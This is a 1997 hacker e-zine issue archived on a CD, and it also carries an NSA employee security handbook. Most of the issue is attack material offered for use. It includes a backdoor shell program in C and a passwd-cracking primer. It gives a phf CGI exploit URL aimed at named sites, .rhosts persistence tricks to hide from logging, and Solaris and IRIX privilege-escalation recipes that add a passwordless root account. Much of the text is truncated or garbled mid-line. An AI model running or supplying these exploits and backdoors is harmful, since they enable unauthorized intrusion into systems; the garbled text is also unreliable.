home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / a_m / cztj001.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  83.8 KB  |  1,813 lines

  1. ───────────────────────────────────────────────────────────────────────────────
  2.  
  3.    ╒══════════════════════════════════════════════════════════════════╕
  4.    │   The CodeZero Technical Journal, March 1997, Issue 001          │▒
  5.    └──────────────────────────────────────────────────────────────────┘▒
  6.     ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
  7.  
  8.   BTW, I use EDIT.COM to view this from DOS, then the ASCII's work.
  9.  
  10. ───────────────────────────────────────────────────────────────────────────────
  11.   In This Issue :
  12. ───────────────────────────────────────────────────────────────────────────────
  13.  
  14. 1. Basic Unix Skills...............................: Testu Khan
  15. 2. so1o.c..........................................: Pluvius / Captor / so1o
  16. 3. The Now Ancient pHf Teknique....................: Tetsu Khan
  17. 4. Solaris Chkperm Teknique........................: Tetsu Khan
  18. 5. Spanking New IRiX 5.3 Hax0r Code................: Tetsu Khan
  19. 6. MSIE 3.01 Bug...................................: Geoffrey Elliott 
  20. 7. NSA Security Handbook...........................: Philip Pease
  21. 8. 911 Autodialer Script...........................: The CodeZero Crew
  22. 9. Common Ports List...............................: Testu Khan
  23. 10.Denial Of Service (DOS) Attack 001 : hddkill.c..: Tetsu Khan
  24. 11.CodeZero World News.............................: Mr.fr1day
  25. 12.News Conclusion.................................: Testu Khan
  26.  
  27. ───────────────────────────────────────────────────────────────────────────────
  28.   1. Basic Unix Skills : Testu Khan
  29. ───────────────────────────────────────────────────────────────────────────────
  30.  
  31. The Basics :
  32. ────────────
  33.  
  34. If you actually gain access and login to your system, you will see something
  35. like this...
  36.  
  37. <systemname>:~:$
  38.  
  39. the $ sign implies you are a standard user, the ~ implies you are in your HOME
  40. directory, such as /home/so1o/. You could find out your user / group ID.
  41.  
  42. codezero:~:$ id
  43. uid(533)tetsu gid(100)users
  44. codezero:~:$
  45.  
  46. or find out your working directory, using PWD (Print Working Directory)
  47.  
  48. codezero:~:$ pwd
  49. /home/tetsu
  50. codezero:~:$
  51.  
  52. Common Commands :
  53. ─────────────────
  54.  
  55. who                                     - displays who is on the system.
  56. uname -a                                - displays the operating system.
  57. finger <login>                          - fingers a user.
  58. finger @<system>                        - fingers all users on a system.
  59. cat /etc/passwd                         - types you the password file.
  60. cat /etc/motd                           - t                             - changes your users password.
  61. whoami                                  - displays your login name.
  62. cd <directory>                          - changes                     - changes to root directory.
  63. cd /usr/games                           - changes to the games directory.
  64. ps -a                                   - lists ALL jobs running on system.
  65. ps -x                                   - Lists ALL jobs YOU are running.
  66. kill -9 <pid>                           - Kill a job, using its PID
  67. echo "<text here" >> file.name          - types test into files, eg...
  68.  
  69. codezero:~:$ echo "i am eleet" >> eleet
  70. codezero:~:$ cat eleet
  71. i am eleet
  72. codezero:~:$
  73.  
  74. so you wrote "i am eleet" to the file called eleet, then typed it out 
  75. using cat.
  76.  
  77. The /etc/passwd Phile...
  78. ────────────────────────
  79.  
  80. if it is unshadowed, or the shadow suite is not installed, the passwd file
  81. will look like this...
  82.  
  83. root:.et2UIAUFnn23:0:0:System Operator:/:/bin/bash
  84. bin:*:1:1:bin:/usr/bin:/bin/bash
  85. :
  86. :
  87. :
  88. james::533:100:James Smith:/home/james:/bin/csh
  89. tetsu:Hu.99rjpZzdf:534:100:Tetsu Khan:/home/tetsu:/bin/csh
  90.   ^         ^       ^   ^       ^          ^          ^
  91.   |         |       |   |       |          |          |
  92.   A         B       C   D       E          F          G
  93.  
  94.  
  95. A - login name, what is typed at the login prompt.
  96. B - ENCRYPTED password field, I will go into more detail later.
  97. C - user ID, a user id of 1, 2, 3, 4, 5, 6 is usually a super user.
  98. D - group ID, a group id of 1, 2, 3, 4, 5, 6, is usually super user.
  99. E - The name of the user in the "real world".
  100. F - The users home directory, where he starts off after login.
  101. G - The shell that the user uses.
  102.  
  103. root has a password.
  104. bin has never logged in (bin:*:...).
  105. james has NO password, he just presses enter when asked for it.
  106. tetsu has a password.
  107.  
  108. The Password Field :
  109. ────────────────────
  110.  
  111. This is encrypted, so how do we decrypt it to find the users login
  112. and password?
  113.  
  114. The NSA developed the encrd
  115. the decryption key as to date, only the NSA know, so we find the users
  116. passwords by using a CRACKING program, such as crackerjack or john the
  117. ripper, these are available at many www sites :
  118.  
  119. http://globalkos.org/
  120. http://www.l0pht.com/
  121.  
  122. When you have crackerjac
  123. passwords have to be between 6 and 8 letters long, it is not very difficult
  124. to crack such password files, i have a dictionary file, that i wrote, he are
  125. some examples of common passwords....
  126.  
  127. qwerty
  128. secret
  129. password
  130. passwd
  131. abc123
  132. 123abc
  133. monday
  134. tuesday
  135. wednesday
  136. thursday
  137. friday
  138. saturday
  139. sunday
  140.  
  141. So now you have a cracking program and a wordlist, or dictionary file, then
  142. you proceed to leave your computer to crack your freshly pulled /etc/passwd
  143. files, so you run the cracker and wait for some results.
  144.  
  145. The common shells are :
  146. ───────────────────────
  147.  
  148. sh          - a bourne (standard) shell.
  149. csh         - a "c" shell (used in programming)
  150. tcsh        - a turbo "c" shell (used in programming)
  151. bash        - a "bourne again shell" - most popular, easy to use.
  152. ksh         - the "korn shell"
  153. pdksh       - the "public domain korn shell"
  154.  
  155. Users on a system :
  156. ───────────────────
  157.  
  158. root - systems administrator, has the most priveleges, can do anything.
  159.  
  160. bin  - owns the system binaries (/bin/), most times this account is never
  161.        used, so the password field is a * , this means that bin has never
  162.        logged into the system.
  163.  
  164. to find out the other users, just look at the /etc/passwd or /etc/group
  165. files, or use finger <user> , eg finger root
  166.  
  167. Shadowed /etc/passwd files :
  168. ────────────────────────────
  169.  
  170. In systems with higher security, the /etc/passwd file may look like this...
  171.  
  172. roetsu:x:534:100:Tetsu Khan:/home/tetsu:/bin/csh
  173.  
  174. in this case, the encrypted password fields are replaced with x's and so
  175. they cannot be cracked, even if the user, like james, has no password, an
  176. x still is placed in the password field.
  177. various programs can be used to "unshadow" such password files, but I'll
  178. go into that another time.
  179.  
  180. Hiding Yourself from WHO :
  181. ──────────────────────────
  182.  
  183. codezero:/:$ cd                          (go to your home directory)
  184. codezero:~:$ pwd                         (are you in your home directory?)
  185. /home/so1o
  186. codezero:~:$ echo "+ +" >> .rhosts       (place a "+ +" in the .rhosts file)
  187.  
  188. there, the .rhosts file lets you do the following :
  189.  
  190. 1) login using rsh and rlogin programs WITHOUT a password needed, so if the
  191.    REAL user changes his/her password, you still have access.
  192.  
  193. 2) login using rsh to hide yourself from WHO...
  194.  
  195. you telnet back into the system...
  196.  
  197. codezero:~:$ telnet localhost 23
  198.  
  199. Trying 192.203.180.5 ...
  200. Connected to codezero.com
  201. Escape character is '^]'.
  202.  
  203.  
  204. SunOS UNIX (lurch)
  205. login: tetsu
  206. Password:
  207.  
  208. Last login: Mon Mar 10 13:27:27 from w00p.org
  209. SunOS Release 4.1 (KERNEL031895) #2: Sat Mar 18 08:20:29 EST 1995
  210.  
  211.                      WELCOME TO CODEZERO.
  212.  
  213. codezero:~:$ who
  214. tetsu     tty1  (w00p.org)
  215. tetsu     tty2  (localhost)
  216. codezero:~:$
  217.  
  218. now, you have cleared your tracks quickly, as it says when the
  219. user logs in :
  220.  
  221. Last login: Mon Mar 10 13:27:27 from w00p.org
  222. SunOS Release 4.1 (KERNEL031895) #2: Sat Mar 18 08:20:29 EST 1995
  223.  
  224. w00p.org is the last place I logged in FROM, if i was hacking this system,
  225. and the REAL user of this account was to see that, they would become very
  226. suspicious, and probably mail root@w00p.org
  227. So i telnet to localhost, so when the next user logs in through telnet, they
  228. see this...
  229.  
  230. Last login: Mon Mar 10 14:27:27 from localhost
  231. SunOS Release 4.1 (KERNEL031895) #2: Sat Mar 18 08:20:29 EST 1995
  232.  
  233. And do not become suspicious, as root could have logged in as that user from
  234. localhost.
  235.  
  236. Now it is safe for us to exit the system...
  237.  
  238. codezero:~:$ exit
  239.  
  240. Logout
  241.  
  242. Connection Closed.
  243.  
  244. codezero:~:$ exit
  245.  
  246. Logout
  247.  
  248. Connection Closed.
  249.  
  250. I have now logged out of the system, next i can log into a different system,
  251. or my OWN linux system, and type this to log into codezero.com without a 
  252. password, and I will be hidden too!
  253.  
  254. darkstar:~:# rsh -l tetsu codezero.com csh -i
  255.  
  256. No control on this terminal blah blah blah...
  257. codezero:~:$ who
  258. codezero:~:$
  259.  
  260. the WHO shows that no-one is logged onto the system...it has worked!
  261.  
  262. codezero:~:$ whoami
  263. tetsu
  264. codezero:~:$
  265.  
  266. Now I can go through the system and hack it without being logged or seen,
  267. not even root or a super-user can see me!
  268.  
  269. Where to get your accounts / systems to hack...
  270. ───────────────────────────────────────────────
  271.  
  272. I advise that you go into irc, then connect to EFnet, EFnet servers are...
  273.  
  274. irc.nol.net
  275. irc.gate.net
  276. irc.primenet.com
  277. irc.cerf.net
  278.  
  279. Then join #shells or #shell to trade your shells, i suggest you make a fake
  280. /etc/passwd file and trade it for a shell, or trade warez or porn, many
  281. traders will trade shells for stuff like that...
  282.  
  283. General shells words :
  284. ──────────────────────
  285.  
  286. EggBot    -  An EggBot is a program that is run on a hacked system, it runs
  287.              even after you have logged off the system, examples of EggBots
  288.              are as GuardBots in IRC channels, a program called TCL is often
  289.              needed to make EggBots.
  290.  
  291. Quota     -  If an account has NO quota, then the user can put as much on
  292.              the hard drive as he or she wants, whereas systems like schools
  293.              usually enforce about 5mb quotas, and so warez traders cannot
  294.              store their programs there.
  295.  
  296. Bandwidth - Modem Speeds Are :
  297.  
  298.                 ISDN  :  Not really fast
  299.                   T1  :  Around 10mb/second
  300.                   T3  :  Around 40mb/second
  301.                  oc3  :  VERY VERY VERY FAST
  302.  
  303.             The more bandwidth a system has, the faster information travels
  304.             across it.
  305.  
  306. Until Next Month, Happy Hacking...
  307.  
  308. ───────────────────────────────────────────────────────────────────────────────
  309.   2. So1o.c : Originally By Pluvius, Modified By Captor, Expect Lucifer.c s00n!
  310. ───────────────────────────────────────────────────────────────────────────────
  311.  
  312. /**********************************************************************/
  313. /*                        THE CodeZero PRESENTS                       */
  314. /*                                                                    */
  315. /*              so1o.c - Simple Linux Back Door Program               */
  316. /**********************************************************************/
  317. /* so1o.c opens a default port of 5010 on the system running it, then */ 
  318. /* a user can exit and connect to target.com 5010 and then throw      */
  319. /* commands at the system, the only thing is that all commands must   */
  320. /* be preceeded with a ; sign, eg... who; ls -l; exit; and so on...   */
  321. /* a prompt has not yet been implemented, and users logged onto port  */
  322. /* 5010 do not appear on a WHO, so1o.c is verhas only been tested on linux 2.0.29 using...         */
  323. /* --------->     cc -o so1o -O so1o.c to compile it      <---------- */
  324. /**********************************************************************/
  325.  
  326. #define PORT 5010
  327. #include <stdio.h>
  328. #include <signal.h>
  329. #include <sys/types.h>
  330. #include <sys/socket.h>
  331. #include <netinet/in.h>
  332.  
  333. int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
  334.  
  335. struct sockaddr_in serv_addr;
  336. struct sockaddr_in client_addr;
  337.  
  338. int main () {
  339.         soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  340.         if (soc_des == -1) exit(-1);
  341.         bzero((char *) &serv_addr, sizeof(serv_addr));
  342.         serv_addr.sin_family = AF_INET;
  343.         serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
  344.         serv_addr.sin_port = htons(PORT);
  345.         soc_rc = bind(soc_des, (struct sockaddr *)
  346.         &serv_addr, sizeof(serv_addr));
  347.         if (soc_rc != 0  exit(0);
  348.         setpgrp();
  349.         signal(SIGHUP, SIG_IGN);
  350.         if (fork() != 0) exit(0);
  351.         soc_rc = listen(soc_des, 5);
  352.         if (soc_rc != 0) exit(0);
  353.         while (1) {
  354.                 soc_len =
  355.                 sizeof(client_addr);
  356.                 soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,
  357.                 &soc_len);
  358.                 if (soc_cli < 0) exit(0);
  359.                 cli_pid = getpid();
  360.                 server_pid = fork();
  361.                 if (server_pid != 0) {
  362.                         dup2(soc_cli,0);
  363.                         dup2(soc_cli,1);
  364.                         dup2(soc_cli,2);
  365.                         execl("/bin/sh","sh",(char *)0);
  366.                         close(soc_cli);
  367.                         exit(0); }
  368.                 close(soc_cli);
  369.         }
  370. }
  371.  
  372. ───────────────────────────────────────────────────────────────────────────────
  373.   3. The Now Ancient pHf Teknique : Tetsu Khan
  374. ───────────────────────────────────────────────────────────────────────────────
  375.  
  376. Okay, pHf was first used in November 1996, by a group of hackers that hacked
  377. the FBI homepage, since then hackers have hacked many many many other pages
  378. including NASA and others.
  379.  
  380. All you do is run netscape, or lynx, or whatever, then type this as the
  381. site address...
  382.  
  383.      http://site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  384.  
  385. replace site.com with your site address, try www.nasa.gov :)
  386.  
  387. Thats it! you should get the /etc/passwd unless the bug has been patched.
  388.  
  389. ───────────────────────────────────────────────────────────────────────────────
  390.  4. The Solaris Chkperm Teknique : Tetsu Khan
  391. ───────────────────────────────────────────────────────────────────────────────
  392.  
  393. Type (or cut + paste) these commands whilst on a Unix System V or Solaris
  394. system, dont type the % signs
  395.  
  396. % /bin/csh
  397. % mkdir /tmp/foo
  398. % mkdir /tmp/foo/lib
  399. % chmod -R 777 /tmp/foo
  400. % setenv VMSYS /tmp/foo
  401. % umask 0000
  402. % ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
  403. % /usr/vmshosts
  404. -rw-rw-rw-  2 bin      bin            0 Nov 12 09:41 .rhosts
  405. % echo "+ +" >> /usr/bin/.rhosts
  406. % ls -l /usr/bin/.rhosts
  407. -rw-rw-rw-  2 bin      bin            4 Nov 12 09:41 .rhosts
  408. % rsh -l bin localhost /bin/csh -i
  409. Warning: no access to tty; thus no job control in this shell...
  410. % id
  411. uid=2(bin) gid=2(bin)
  412.  
  413. Now you have the .rhosts file from the unix tutorial in part 1 active, so
  414. you can use rsh -l bin system.com csh -i to login without a password OR
  415. being seen with WHO or being logged.
  416. bin isnt as good as root, but bin owns nearly all the programs on the system
  417. so you can have phun with those :)
  418.  
  419. ───────────────────────────────────────────────────────────────────────────────
  420.   5. Spanking New IRiX 5.3 Hax0r Code : Tetsu Khan
  421. ───────────────────────────────────────────────────────────────────────────────
  422.  
  423. Login to an IRiX 5.3 system, then do this...
  424. (dont type the % signs)
  425.  
  426. % /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
  427.   (count to three, and hit ctrl-c)
  428.  
  429. % ls -la /etc/passwd
  430. -rw-r--r--    1 csh      users        956 Feb 25 06:23 /etc/passwd
  431.  
  432. And now I've got root access...so you can change the /etc/passwd using...
  433.  
  434. % echo "rewt::0:0:mr.rewt:/:/bin/bash" >> /etc/passwd
  435.  
  436. now you created a user called rewt, with no password, so...
  437.  
  438. % exit
  439.  
  440. then login to the system with rewt as login and hit enter for the password!
  441.  
  442. ───────────────────────────────────────────────────────────────────────────────
  443.   6. MSIE 3.01 Bug : Paul Greene / Geoffrey Elliott
  444. ───────────────────────────────────────────────────────────────────────────────
  445.  
  446. Proof that MicroSoft have no clue...Put this on a page and load up MSIE 3.01
  447. and try it for yourself, modify it ARSET=us-ascii; NAME="iebug.html"
  448. Content-ID: <Pine.SUN.3.94.970303111313.25374D@dfw.dfw.net>
  449. Content-Description:
  450.  
  451. <!-- FNORD --><!-- FNORD --><!-- FNORD -->
  452. <HTML>
  453. <HEAD><TITLE>Internet Explorer Bug</TITLE></HEAD>
  454. <BODY BGCOLOR=BLACK VLINK=BLUE LINK=BLUE>
  455. <TABLE WIDTH=580><TR><TD>
  456. <FONT COLOR=WHITE>
  457. <I>Cybersnot Industries</I><BR>
  458. <FONT COLOR=RED SIZE=5><B>Internet Explorer Bug</B></FONT><BR>
  459.  
  460. <HR>
  461. <BR>
  462. <BR>
  463. <FONT COLOR=RED><B>Internet Explorer Bug 2/27/97 (Version 3.0 (4.70.1155))</B></FONT><BR>
  464. Microsoft Internet Explorer v3.01 (and earlier?) has a serious
  465. bug which allows web page writers to use ".LNK" and ".URL" files
  466. to run programs on a remote computer.  This bug is particularly damaging
  467. because it uses NO ActiveX, and works even when Internet Explorer is set
  468. to its highest security level.  It was tested on Microsoft Internet Explorer
  469. Version 3.0 (4.70.1155) running Windows 95.  This demo assumes that Windows
  470. is installed in "C:\WINDOWS".  Windows 95 DOES NOT PROMPT BEFORE EXECUTING
  471. THESE FILES.
  472. <P>
  473. ..URL files are WORSE than .LNK files because .URLs work in both Windows 95 and
  474. Windows NT 4.0 (.LNK's only work in Windows 95).  .URL files present a possibly
  475. greater danger because they can be easily created by server side scripts to meet
  476. the specific settings of a user's system.  We will provide .URL files for
  477. execution in the next day or so.
  478. <P>
  479. The "shortcuts" can be set to be minimized during execution which means that users may
  480. not even be aware that a program has been started.  Microsoft's implementation of
  481. shortcuts becomes a serious concern if a webpage can tell Internet Explorer to refresh
  482. to an executable.  Or worse, client side scripts (Java, JavaScript, or VBScript) can
  483. use the Explorer object to transfer a BATCH file to the target machine and then META
  484. REFRESH to that BATCH file to execute the rogue command in that file.
  485. <P>
  486. The following table outlines which areas and users each shortcut tBORDER=1>
  487. <TR>
  488.         <TD><FONT COLOR=WHITE>File Type</FONT></TD>
  489.         <TD><FONT COLOR=WHITE>Windows 95</FONT></TD>
  490.         <TD><FONT COLOR=WHITE>Windows NT</FONT></TD>
  491.         <TD><FONT COLOR=WHITE>Execute Apps</FONT></TD>
  492.         <TD><FONT COLOR=WHITE>Command Line Args Allowed</FONT></TD>
  493.         <TD><FONT COLOR=WHITE>Searches Path</FONT></TD>
  494. </TR>
  495. <TR>
  496.         <TD><FONT COLOR=WHITE>.LNK</FONT></TD>
  497.         <TD><FONT COLOR=WHITE>Yes</FONT></TD>
  498.         <TD><FONT COLOR=WHITE>No</FONT></TD>
  499.         <TD><FONT COLOR=WHITE>Yes</FONT></TD>
  500.         <TD><FONT COLOR=WHITE>Yes</FONT></TD>
  501.         <TD><FONT COLOR=WHITE>No</FONT></TD>
  502. </TR>
  503. <TR>
  504.         <TD><FONT COLOR=WHITE>.URL</FONT></TD>
  505.         <TD><FONT COLOR=WHITE>Yes</FONT></TD>
  506.         <TD><FONT COLOR=WHITE>Yes</FONT></TD>
  507.         <TD><FONT COLOR=WHITE>Yes</FONT></TD>
  508.         <TD><FONT COLOR=WHITE>No</FONT></TD>
  509.         <TD><FONT COLOR=WHITE>Yes</FONT></TD>
  510. </TR>
  511. </TABLE>
  512. <FONT SIZE=2>Security Comparision .URL vs .LNK</FONT>
  513. </CENTER>
  514. <P>
  515. Naturally, the files must exist on the remote machine to be
  516. properly executed.  But, Windows 95 comes with a variety of potentially
  517. damaging programs which can easily be executed.  The following link will
  518. start the standard calculator which comes with Windows 95.
  519. <P>
  520. <A HREF="calculator.lnk">Windows Calculator (.lnk)</A>.<BR>
  521. <A HREF="calcnt.url">Windows Calculator (.url)</A>.
  522. <P>
  523. This bug can be used to wreak havoc on a remote user's machine.  The
  524. following links will create and delete some directories.
  525. <P>
  526. <A HREF="mkdir.lnk">Create a directory "C:\HAHAHA"</A>.<BR>
  527. <A HREF="explorer.lnk">Open "C:\HAHAHA"</A><BR>
  528. <A HREF="rmdir.lnk">Remove the directory "C:\HAHAHA"</A><BR>
  529. <P>
  530. The META REFRESH tag can be used to execute multiple commands in sequence.
  531. <P>
  532. <BR>
  533. <HR>
  534. <FONT SIZE=2>
  535. <FONT COLOR=RED><B>Internet Explorer Bug</B></FONT><BR>
  536. Discovered By <A HREF="mailto:shoggothe@cybersnot.com">Paul Greene</A><BR>
  537. Page and Examples by <A HREF="mailto:geo@cybersnot.com">Geoffrey Elliott</A>
  538. & <A HREF="mailto:bmorin@cybersnot.com">Brian Morin</A><BR>
  539. </TD></TR></TABLE>
  540. </BODY>
  541. </HTML>
  542. <!-- FNORD --><!-- FNORD --><!-- FNORD -->
  543.  
  544. ───────────────────────────────────────────────────────────────────────────────
  545.   7. The NSA Security Handbook : Philip Pease.
  546. ───────────────────────────────────────────────────────────────────────────────
  547.  
  548. Security Guidelines
  549.  
  550. This handbook is designed to introdules and procedures with which all NSA employees must comply.
  551. It highlights some of your security responsibilities, and provides guidelines
  552. for answering questions you may be asked concerning your association with this
  553. Agency.  Although you will be busy during the forthcoming weeks learning your
  554. job, meeting co-workers, and becoming accustomed to a new work environment, you
  555. are urged to become familiar with the security information contained in this
  556. handbook.  Please note that a listing of telephone numbers is provided at the
  557. end of this handbook should you have any questions or concerns.
  558.  
  559. Introduction
  560.  
  561. In joining NSA you have been given an opportunity to participate in the
  562. activities of one of the most important intelligence organizations of the United
  563. States Government.  At the same time, you have also assumed a trust which
  564. carries with it a most important individual responsibility--the safeguarding of
  565. sensitive information vital to the security of our nation.
  566.  
  567. While it is impossible to estimate in actual dollars and cents the value of the
  568. work being conducted by this Agency, the information to which you will have
  569. access at NSA is without question critically important to the defense of the
  570. United States.  Since this information may be useful only if it is kept secret,
  571. it requires a very special measure of protection.  The specific nature of this
  572. protection is set forth in various Agency security regulations and directives.
  573. The total NSA Security Program, however, extends beyond these regulations.  It
  574. is based upon the concept that security begins as a state of mind.  The program
  575. is designed to develop an appreciation of the need to protect information vital
  576. to the national defense, and to foster the development of a level of awareness
  577. which will make security more than routine compliance with regulations.
  578.  
  579. At times, security practices and procedures cause personal inconvenience.  They
  580. take time and effort and on occasion may make it necessary for you to
  581. voluntarily forego some of your usual personal perogatives.  But your
  582. compensation for the inconvenience is the knowledge that the work you are
  583. accomplishing at NSA, within a framework of sound security practices,
  584. contributes significantly to the defense and continued security of the United
  585. States of America.
  586.  
  587. I extend to you my very best wishes as you enter upon your chosen career or
  588. assignment with NSA.
  589.  
  590. Philip T. Pease
  591. Director of Security
  592.  
  593.  
  594. INITIAL SECURITY RESPONSIBILITIES
  595.  
  596. Anonymity
  597.  
  598. Perhaps one of the first security practices with which new NSA personnel should
  599. become acquainted is the practice of anonymity.  In an open society such as ours,
  600. this practice is necessary because information which is generally available to
  601. the public is available also to hostile intelligence.  Therefore, the Agency
  602. mission is best accomplished apart from public attention.  Basically, anonymity
  603. means that NSA personnel are encouraged not to draw attention to themselves nor
  604. to their association with this Agency.  NSA personnel are also cautioned neither
  605. to confirm nor deny any specific questions about NSA activities directed to them
  606. by individuals not affiliated with the Agency.
  607.  
  608. The ramifications of the practice of anonymity are rather far reaching, and its
  609. success depends on the cooperation of all Agency personnel.  Described below you
  610. will find some econcerning your
  611. employment and how you should cope with them.  Beyond the situations cited, your
  612. judgement and discretion will become the deciding factors in how you respond to
  613. questions about your employment.
  614.  
  615. Answering Questions About Your Employment
  616.  
  617. Certainly, you may tell your family and friends that you are employed at or
  618. assigned to the National Security Agency.  There is no valid reason to deny them
  619. this information.  However, 
  620. concerning specific aspects of the Agency's mission, activities, and
  621. organization.  You should also ask them not to publicize your association with
  622. NSA.
  623.  
  624. Should strangers or casual acquaintances question you about your place of
  625. employment, an appropriate reply would be that you work for the Department of
  626. Defense.  If questioned further as to where you are employed within the
  627. Department of Defense, you may reply, "NSA."  When you inform someone that you
  628. work for NSA (or the Department of Defense) you may expect that the next
  629. question will be, "What do you do?"  It is a good idea to anticipate this
  630. question and to formulate an appropriate answer.  Do not act mysteriously about
  631. your employment, as that would only succeed in drawing more attention to
  632. yourself.
  633.  
  634. If you are employed as a secretary, engineer, computer scientist, or in a
  635. clerical, administrative, technical, or other capacity identifiable by a general
  636. title which in no way indicates how your talents are being applied to the
  637. mission of the Agency, it is suggested that you state this general title.  If
  638. you are employed as a linguist, you may say that you are a linguist, if
  639. necessary.  However, you should not indicate the specific language(s) with which
  640. you are involved.
  641.  
  642. The use of service specialty titles which tend to suggest or reveal the nature of
  643. the Agency's mission  or specific aspects of their work.  These professional
  644. titles, such as cryptanalyst, signals collection officer, and intelligence
  645. research analyst, if given verbatim to an outsider, would likely generate
  646. further questions which may touch upon the classified aspects of your work.
  647. Therefore, in conversation with outsiders, it is suggested that such job titles
  648. be generalized.  For example, you might indicate that you are a "research
  649. analyst."  You may not, however, discuss the specific nature of your analytic
  650. work.
  651.  
  652. Answering Questions About Your Agency Training
  653.  
  654. During your career or assignment at NSA, there is a good chance that you will
  655. receive some type of job-related training.  In many instances the nature of the
  656. training is not classified.  However, in some situations the specialized
  657. training you receive will relate directly to sensitive Agency functions.  In
  658. such cases, the nature of this training may not be discussed with persons
  659. outside of this Agency.
  660.  
  661. If your training at the Agency includes language training, your explanation for
  662. the source of your linguistic knowledge should be that you obtained it while
  663. working for the Department of Defense.
  664.  
  665. You Should not draw undue attention to your language abilities, and you may not
  666. discuss how you apply your language skill at the Agency.
  667.  
  668. If you are considering part-time employment which requires the use of language
  669. or technical skills similar to those required for the performance of your NSA
  670. assigned duties, you must report (in advance) the anticipated part-time work
  671. through your Staff Security Officer (SSO) to the Office of Security's Clearance
  672. Division (M55).
  673.  
  674. Verifel must provide information concerning their employment to
  675. credit institutions in connection with various types of applications for credit.
  676. In such situations you may state, if you are a civilian employee, that you are
  677. employed by NSA and indicate your pay grade or salary.  Once again, generalize
  678. your job title.  If any further information is desired by persons or firms with
  679. whom you may be dealing, instruct them to request such information by
  680. correspondence addressed to:  Director of Civilian Personnel, National Security
  681. Agenc  Military personnel should
  682. use their support group designator and address when indicating their current
  683. assignment.
  684.  
  685. If you contemplate leaving NSA for employment elsewhere, pplication, or to participate in extensive employment
  686. interviews.  In such circumstances, you should have your resume reviewed by the
  687. Classification Advisory Officer (CAO) assigned to your organization.  Your CAO
  688. will ensure that any classified operational details of your duties have been
  689. excluded and will provide you with an unclassified job description.  Should you
  690. leave the Agency before preparing such a resume, you may develop one and send it
  691. by registered mail to the NSA/CSS Information Policy Division (Q43) for review.
  692. Remember, your obligation to protect sensitive Agency information extends
  693. beyond your emploMedia
  694.  
  695. >From time to time you may find that the agency is the topic of reports or
  696. articles appearing in public news media--newspapers, magazines, books, radio
  697. and TV.  The NSA/CSS Information Policy Division (Q43) represents the Agency in
  698. matters involving the press and other media.  This office serves at the
  699. Agency's official media center and is the Director's liaison office for public
  700. relations, both in the community and with other government agencies.  The
  701. Information Policy Division must approve the release of all information for and
  702. about NSA, its mission, activities, and personnel.  In order to protect the
  703. aspects of Agency operations, NSA personnel must refrain from either confirming
  704. or denying any information concerning the Agency or its activities which may
  705. appear in the public media.  If you are asked about the activities of NSA, the
  706. best response is "no comment."  You should the notify Q43 of the attempted
  707. inquiry.  For the most part, public references to NSA are based upon educated
  708. guesses.  The Agency does not normally make a practice of issuing public
  709. statements about its activities.
  710.  
  711. GENERAL RESPONSIBILITIES
  712.  
  713. Espionage And Terrorism
  714.  
  715. During your security indoctrination and throughout your NSA career pionage and terrorist threat to the United
  716. States.  Your vigilance is the best single defense in protecting NSA
  717. information, operations, facilities and people.  Any information that comes to
  718. your attention that suggests to you the existence of, or potential for,
  719. espionage or terrorism against the U.S. or its allies must be promptly reported
  720. by you to the Office of Security.
  721.  
  722. There should be no doubt in your mind about the reality of the threats.  You
  723. are now affiliated with the most sensitive agency in government and are
  724. expected to exercise vigilance and common sense to protect NSA against these
  725. threats.
  726.  
  727. Classification
  728.  
  729. Originators of correspondence, communications, equipment, or documents within
  730. the Agency are responsible for ensuring that the proper classification,
  731. downgrading information and, when appropriate, proper caveat notations are
  732. assigned to such material.  (This includes any handwritten notes which contain
  733. classified information).  The three levels of classification are Confidential,
  734. Secret and Top Secret.  The NSA Classification Manual should be used as
  735. guidance in determining proper classification.  If after review of this document
  736. you need assistance, contact the Classification Advisory Officer (CAO) assigned
  737. to your organization, or the Information Policy Division (Q43).
  738.  
  739. Need-To-Know
  740.  
  741. Classified information is disseminated need-to-know" policy means that classified information will be
  742. disseminated only to those individuals who, in addition to possessing a proper
  743. clearance, have a requirement to know this information in order to perform
  744. their official duties (need-to-know).  No person is entitled to classified
  745. information solely by virtue of office, position, rank, or security clearance.
  746.  
  747. All NSA personnel have the responsibility to assert the "need-to-know" policy
  748. as part of their responsibility to protect sensitive information.
  749. Determination of "need-to-know" is a supervisory responsibility.  This means
  750. that if there is any doubt  is information or material marked "FOR
  751. OFFICIAL USE ONLY" (such as this handbook).  This designation is used to
  752. identify that official information or material which, although unclassified, is
  753. exempt from the requirement for public disclosure of information concerning
  754. government activities and which, for a significant reason, should not be given
  755. general circulation.  Each holder of "FOR OFFICAL USE ONLY" (FOUO) information
  756. or material is authorized to disclose such information or material to persons
  757. in other departments or agencies of the Executive and Judicial branches when it
  758. is determined that the information or material is required to carry our a
  759. government function.  The recipient must be advised that the information or
  760. material is not to be disclosed to the general public.  Material which bears
  761. the "FOR OFFICIAL USE ONLY" caveat does not come under the regulations
  762. governing the protection of classified information.  The unauthorized
  763. disclosure of information marked "FOR OFFICIAL USE ONLY" does not constitute an
  764. unauthorized disclosure of classified defense information.  However, Department
  765. of Defense and NSA regulations prohibit the unauthorized disclosure of
  766. information designated "FOR OFFICIAL USE ONLY."  Appropriate administrative
  767. action will be taken to determine responsibility and to apply corrective and/or
  768. disciplinary measures in cases of unauthorized disclosure of information which
  769. bears the "FOR OFFICIAL USE ONLY" caveat.  Reasonable care must be exercised in
  770. limiting the dissemination of "FOR OFFICIAL USE ONLY" information.  While you
  771. may take this handbook home for further study, remember that is does contain
  772. "FOR OFFICIAL USE ONLY" information which should be protected.
  773.  
  774. Prepublication Review
  775.  
  776. All NSA personnel (employees, military assignees, and contractors) must submit
  777. for review any planned articles, books, speeches, resumes, or public statements
  778. that may contain classified, classifiable, NSA-derived, or unclassified
